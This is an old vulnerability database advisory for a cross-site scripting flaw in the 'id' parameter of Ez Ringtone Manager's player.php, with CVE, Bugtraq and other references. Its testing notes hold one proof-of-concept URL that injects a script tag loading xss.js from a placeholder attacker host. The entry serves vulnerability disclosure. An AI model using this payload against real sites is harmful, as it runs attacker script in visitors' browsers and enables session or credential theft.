Ez Ringtone Manager player.php id Variable XSS

2006-06-07T06:18:59
ID OSVDB:26250
Type osvdb
Reporter luny (luny@youfucktard.com)
Modified 2006-06-07T06:18:59

Description

Manual Testing Notes

http://[target]/ringtones/player.php?action=preview&id=<SCRIPT%20SRC=http://[attacker]/xss.js></SCRIPT>&cat=LG%20Mobiles

References:

Vendor URL: http://www.scriptsez.net/
Secunia Advisory ID: 20530
Related OSVDB ID: 26251
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0069.html
FrSIRT Advisory: ADV-2006-2237
CVE-2006-3004
Bugtraq ID: 18340